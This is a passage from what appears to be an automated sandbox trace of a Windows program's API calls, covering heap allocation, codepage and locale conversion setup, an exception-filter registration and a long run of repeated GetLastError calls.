(HeapHandle=0x2f90000, Flags=0x8, Size=0x3a) returned 0x2f92450 [0112.710] RtlAllocateHeap (HeapHandle=0x2f90000, Flags=0x8, Size=0x90) returned 0x2f92498 [0112.710] RtlAllocateHeap (HeapHandle=0x2f90000, Flags=0x8, Size=0x24) returned 0x2f92530 [0112.710] RtlAllocateHeap (HeapHandle=0x2f90000, Flags=0x8, Size=0x30) returned 0x2f92560 [0112.710] RtlAllocateHeap (HeapHandle=0x2f90000, Flags=0x8, Size=0x36) returned 0x2f92598 [0112.710] RtlAllocateHeap (HeapHandle=0x2f90000, Flags=0x8, Size=0x48) returned 0x2f925d8 [0112.710] RtlAllocateHeap (HeapHandle=0x2f90000, Flags=0x8, Size=0x52) returned 0x2f92628 [0112.710] RtlAllocateHeap (HeapHandle=0x2f90000, Flags=0x8, Size=0x3c) returned 0x2f92688 [0112.710] RtlAllocateHeap (HeapHandle=0x2f90000, Flags=0x8, Size=0x82) returned 0x2f926d0 [0112.710] RtlAllocateHeap (HeapHandle=0x2f90000, Flags=0x8, Size=0x2e) returned 0x2f92760 [0112.710] RtlAllocateHeap (HeapHandle=0x2f90000, Flags=0x8, Size=0x1e) returned 0x2f92798 [0112.710] RtlAllocateHeap (HeapHandle=0x2f90000, Flags=0x8, Size=0x2c) returned 0x2f927c0 [0112.710] RtlAllocateHeap (HeapHandle=0x2f90000, Flags=0x8, Size=0x54) returned 0x2f927f8 [0112.710] RtlAllocateHeap (HeapHandle=0x2f90000, Flags=0x8, Size=0x52) returned 0x2f92858 [0112.710] RtlAllocateHeap (HeapHandle=0x2f90000, Flags=0x8, Size=0x2a) returned 0x2f928b8 [0112.710] RtlAllocateHeap (HeapHandle=0x2f90000, Flags=0x8, Size=0x3c) returned 0x2f928f0 [0112.710] RtlAllocateHeap (HeapHandle=0x2f90000, Flags=0x8, Size=0x54) returned 0x2f92938 [0112.710] RtlAllocateHeap (HeapHandle=0x2f90000, Flags=0x8, Size=0x24) returned 0x2f92998 [0112.710] RtlAllocateHeap (HeapHandle=0x2f90000, Flags=0x8, Size=0x30) returned 0x2f929c8 [0112.710] RtlAllocateHeap (HeapHandle=0x2f90000, Flags=0x8, Size=0x8c) returned 0x2f92a00 [0112.710] HeapFree (in: hHeap=0x2f90000, dwFlags=0x0, lpMem=0x2f911f8 | out: hHeap=0x2f90000) returned 1 [0112.710] GetModuleHandleA (lpModuleName="KERNEL32") returned 0x76d30000 [0112.710] GetProcAddress (hModule=0x76d30000, lpProcName="IsProcessorFeaturePresent") returned 0x76d45235 [0112.710] IsProcessorFeaturePresent (ProcessorFeature=0x0) returned 0 [0112.712] RtlAllocateHeap (HeapHandle=0x2f90000, Flags=0x8, Size=0x80) returned 0x2f92a98 [0112.712] RtlAllocateHeap (HeapHandle=0x2f90000, Flags=0x8, Size=0x800) returned 0x2f911f8 [0112.712] GetLastError () returned 0x0 [0112.712] SetLastError (dwErrCode=0x0) [0112.712] GetLastError () returned 0x0 [0112.712] SetLastError (dwErrCode=0x0) [0112.712] GetLastError () returned 0x0 [0112.712] SetLastError (dwErrCode=0x0) [0112.712] GetACP () returned 0x4e4 [0112.712] RtlAllocateHeap (HeapHandle=0x2f90000, Flags=0x0, Size=0x220) returned 0x2f91a00 [0112.712] GetLastError () returned 0x0 [0112.712] SetLastError (dwErrCode=0x0) [0112.712] IsValidCodePage (CodePage=0x4e4) returned 1 [0112.713] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18fe84 | out: lpCPInfo=0x18fe84) returned 1 [0112.713] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f950 | out: lpCPInfo=0x18f950) returned 1 [0112.713] GetLastError () returned 0x0 [0112.713] SetLastError (dwErrCode=0x0) [0112.713] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="", cchSrc=1, lpCharType=0x18f8e0 | out: lpCharType=0x18f8e0) returned 1 [0112.713] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0112.713] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f6c8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0112.713] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x18f964 | out: lpCharType=0x18f964) returned 1 [0112.713] GetLastError () returned 0x0 [0112.713] SetLastError (dwErrCode=0x0) [0112.713] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr="", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0112.713] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0112.713] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f698, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ狌곧@Ā") returned 256 [0112.713] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ狌곧@Ā", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0112.713] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ狌곧@Ā", cchSrc=256, lpDestStr=0x18f488, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0112.713] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchWideChar=256, lpMultiByteStr=0x18fc64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x95Ö¤s\x9cþ\x18", lpUsedDefaultChar=0x0) returned 256 [0112.713] GetLastError () returned 0x0 [0112.713] SetLastError (dwErrCode=0x0) [0112.713] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0112.713] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f6b8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ狌곧@Ā") returned 256 [0112.713] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ狌곧@Ā", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0112.713] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ狌곧@Ā", cchSrc=256, lpDestStr=0x18f4a8, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ") returned 256 [0112.713] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ", cchWideChar=256, lpMultiByteStr=0x18fb64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x95Ö¤s\x9cþ\x18", lpUsedDefaultChar=0x0) returned 256 [0112.714] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x40439d) returned 0x0 [0112.714] RtlSizeHeap (HeapHandle=0x2f90000, Flags=0x0, MemoryPointer=0x2f92a98) returned 0x80 [0112.722] lstrlenW (lpString="") returned 0 [0112.722] GetLastError () returned 0x0 [0112.722] GetLastError () returned 0x0 [0112.722] GetLastError () returned 0x0 [0112.722] GetLastError () returned 0x0 [0112.722] GetLastError () returned 0x0 [0112.722] GetLastError () returned 0x0 [0112.722] GetLastError () returned 0x0 [0112.722] GetLastError () returned 0x0 [0112.722] GetLastError () returned 0x0 [0112.723] GetLastError () returned 0x0 [0112.723] GetLastError () returned 0x0 [0112.723] GetLastError () returned 0x0 [0112.723] GetLastError () returned 0x0 [0112.723] GetLastError () returned 0x0 [0112.723] GetLastError () returned 0x0 [0112.723] GetLastError () returned 0x0 [0112.723] GetLastError () returned 0x0 [0112.723] GetLastError () returned 0x0 [0112.723] GetLastError () returned 0x0 [0112.723] GetLastError () returned 0x0 [0112.723] GetLastError () returned 0x0 [0112.723] GetLastError () returned 0x0 [0112.723] GetLastError () returned 0x0 [0112.723] GetLastError () returned 0x0 [0112.723] GetLastError () returned 0x0 [0112.723] GetLastError () returned 0x0 [0112.723] GetLastError () returned 0x0 [0112.723] GetLastError () returned 0x0 [0112.723] GetLastError () returned 0x0 [0112.723] GetLastError () returned 0x0 [0112.723] GetLastError () returned 0x0 [0112.723] GetLastError () returned 0x0 [0112.723] GetLastError () returned 0x0 [0112.723] GetLastError () returned 0x0 [0112.723] GetLastError () returned 0x0 [0112.723] GetLastError () returned 0x0 [0112.723] GetLastError () returned 0x0 [0112.723] GetLastError () returned 0x0 [0112.723] GetLastError () returned 0x0 [0112.723] GetLastError () returned 0x0 [0112.723] GetLastError () returned 0x0 [0112.723] GetLastError () returned 0x0 [0112.724] GetLastError () returned 0x0 [0112.724] GetLastError () returned 0x0 [0112.724] GetLastError () returned 0x0 [0112.724] GetLastError () returned 0x0 [0112.724] GetLastError () returned 0x0 [0112.724] GetLastError () returned 0x0 [0112.724] GetLastError () returned 0x0 [0112.724] GetLastError () returned 0x0 [0112.724] GetLastError () returned 0x0 [0112.724] GetLastError () returned 0x0 [0112.724] GetLastError () returned 0x0 [0112.724] GetLastError () returned 0x0 [0112.724] GetLastError () returned 0x0 [0112.724] GetLastError () returned 0x0 [0112.724] GetLastError () returned 0x0 [0112.724] GetLastError () returned 0x0 [0112.724] GetLastError () returned 0x0 [0112.724] GetLastError () returned 0x0 [0112.724] GetLastError () returned 0x0 [0112.724] GetLastError () returned 0x0 [0112.724] GetLastError () returned 0x0 [0112.724] GetLastError () returned 0x0 [0112.724] GetLastError () returned 0x0 [0112.724] GetLastError () returned 0x0 [0112.724] GetLastError () returned 0x0 [0112.724] GetLastError () returned 0x0 [0112.724] GetLastError () returned 0x0 [0112.724] GetLastError () returned 0x0 [0112.724] GetLastError () returned 0x0 [0112.724] GetLastError () returned 0x0 [0112.724] GetLastError () returned 0x0 [0112.724] GetLastError () returned 0x0 [0112.725] GetLastError () returned 0x0 [0112.725] GetLastError () returned 0x0 [0112.725] GetLastError () returned 0x0 [0112.725] GetLastError () returned 0x0 [0112.725] GetLastError () returned 0x0 [0112.725] GetLastError () returned 0x0 [0112.725] GetLastError () returned 0x0 [0112.725] GetLastError () returned 0x0 [0112.725] GetLastError () returned 0x0 [0112.725] GetLastError () returned 0x0 [0112.725] GetLastError () returned 0x0 [0112.725] GetLastError () returned 0x0 [0112.725] GetLastError () returned 0x0 [0112.725] GetLastError () returned 0x0 [0112.725] GetLastError () returned 0x0 [0112.725] GetLastError () returned 0x0 [0112.725] GetLastError () returned 0x0 [0112.725] GetLastError () returned 0x0 [0112.725] GetLastError () returned 0x0 [0112.725] GetLastError () returned 0x0 [0112.725] GetLastError () returned 0x0 [0112.725] GetLastError () returned 0x0 [0112.725] GetLastError () returned 0x0 [0112.725] GetLastError () returned 0x0 [0112.725] GetLastError () returned 0x0 [0112.725] GetLastError () returned 0x0 [0112.725] GetLastError () returned 0x0 [0112.725] GetLastError () returned 0x0 [0112.725] GetLastError () returned 0x0 [0112.725] GetLastError () returned 0x0 [0112.725] GetLastError () returned 0x0 [0112.726] GetLastError () returned 0x0 [0112.726] GetLastError () returned 0x0 [0112.726] GetLastError () returned 0x0 [0112.726] GetLastError () returned 0x0 [0112.726] GetLastError () returned 0x0 [0112.726] GetLastError () returned 0x0 [0112.726] GetLastError () returned 0x0 [0112.726] GetLastError () returned 0x0 [0112.726] GetLastError () returned 0x0 [0112.726] GetLastError () returned 0x0 [0112.726] GetLastError () returned 0x0 [0112.726] GetLastError () returned 0x0 [0112.726] GetLastError () returned 0x0 [0112.726] GetLastError () returned 0x0 [0112.726] GetLastError () returned 0x0 [0112.726] GetLastError () returned 0x0 [0112.726] GetLastError () returned 0x0 [0112.726] GetLastError () returned 0x0 [0112.726] GetLastError () returned 0x0 [0112.726] GetLastError () returned 0x0 [0112.726] GetLastError () returned 0x0 [0112.726] GetLastError () returned 0x0 [0112.726] GetLastError () returned 0x0 [0112.726] GetLastError () returned 0x0 [0112.726] GetLastError () returned 0x0 [0112.726] GetLastError () returned 0x0 [0112.726] GetLastError () returned 0x0 [0112.726] GetLastError () returned 0x0 [0112.726] GetLastError () returned 0x0 [0112.726] GetLastError () returned 0x0 [0112.727] GetLastError () returned 0x0 [0112.727] GetLastError () returned 0x0 [0112.727] GetLastError () returned 0x0 [0112.727] GetLastError () returned 0x0 [0112.727] GetLastError () returned 0x0 [0112.727] GetLastError () returned 0x0 [0112.727] GetLastError () returned 0x0 [0112.727] GetLastError () returned 0x0 [0112.727] GetLastError () returned 0x0 [0112.727] GetLastError () returned 0x0 [0112.727] GetLastError () returned 0x0 [0112.727] GetLastError () returned 0x0 [0112.727] GetLastError () returned 0x0 [0112.727] GetLastError () returned 0x0 [0112.727] GetLastError () returned 0x0 [0112.727] GetLastError () returned 0x0 [0112.727] GetLastError () returned 0x0 [0112.727] GetLastError () returned 0x0 [0112.727] GetLastError () returned 0x0 [0112.727] GetLastError () returned 0x0 [0112.727] GetLastError () returned 0x0 [0112.727] GetLastError () returned 0x0 [0112.727] GetLastError () returned 0x0 [0112.727] GetLastError () returned 0x0 [0112.727] GetLastError () returned 0x0 [0112.727] GetLastError () returned 0x0 [0112.727] GetLastError () returned 0x0 [0112.727] GetLastError () returned 0x0 [0112.727] GetLastError () returned 0x0 [0112.727] GetLastError () returned 0x0 [0112.727] GetLastError () returned 0x0 [0112.727] GetLastError () returned 0x0 [0112.727] GetLastError () returned 0x0 [0112.728] GetLastError () returned 0x0 [0112.728] GetLastError () returned 0x0 [0112.728] GetLastError () returned 0x0 [0112.728] GetLastError () returned 0x0 [0112.728] GetLastError () returned 0x0 [0112.728] GetLastError () returned 0x0 [0112.728] GetLastError () returned 0x0 [0112.728] GetLastError () returned 0x0 [0112.728] GetLastError () returned 0x0 [0112.728] GetLastError () returned 0x0 [0112.728] GetLastError () returned 0x0 [0112.728] GetLastError () returned 0x0 [0112.728] GetLastError () returned 0x0 [0112.728] GetLastError () returned 0x0 [0112.728] GetLastError () returned 0x0 [0112.728] GetLastError () returned 0x0 [0112.728] GetLastError () returned 0x0 [0112.728] GetLastError () returned 0x0 [0112.728] GetLastError () returned 0x0 [0112.728] GetLastError () returned 0x0 [0112.728] GetLastError () returned 0x0 [0112.728] GetLastError () returned 0x0 [0112.728] GetLastError () returned 0x0 [0112.728] GetLastError () returned 0x0 [0112.728] GetLastError () returned 0x0 [0112.728] GetLastError () returned 0x0 [0112.728] GetLastError () returned 0x0 [0112.728] GetLastError () returned 0x0 [0112.728] GetLastError () returned 0x0 [0112.728] GetLastError () returned 0x0 [0112.728] GetLastError () returned 0x0 [0112.728] GetLastError () returned 0x0 [0112.729] GetLastError () returned 0x0 [0112.729] GetLastError () returned 0x0 [0112.729] GetLastError () returned 0x0 [0112.729] GetLastError () returned 0x0 [0112.729] GetLastError () returned 0x0 [0112.729] GetLastError () returned 0x0 [0112.729] GetLastError () returned 0x0 [0112.729] GetLastError () returned 0x0 [0112.729] GetLastError () returned 0x0 [0112.729] GetLastError () returned 0x0 [0112.729] GetLastError () returned 0x0 [0112.729] GetLastError () returned 0x0 [0112.729] GetLastError () returned 0x0 [0112.729] GetLastError () returned 0x0 [0112.729] GetLastError () returned 0x0 [0112.729] GetLastError () returned 0x0 [0112.729] GetLastError () returned 0x0 [0112.729] GetLastError () returned 0x0 [0112.729] GetLastError () returned 0x0 [0112.729] GetLastError () returned 0x0 [0112.729] GetLastError () returned 0x0 [0112.729] GetLastError () returned 0x0 [0112.729] GetLastError () returned 0x0 [0112.729] GetLastError () returned 0x0 [0112.729] GetLastError () returned 0x0 [0112.729] GetLastError () returned 0x0 [0112.729] 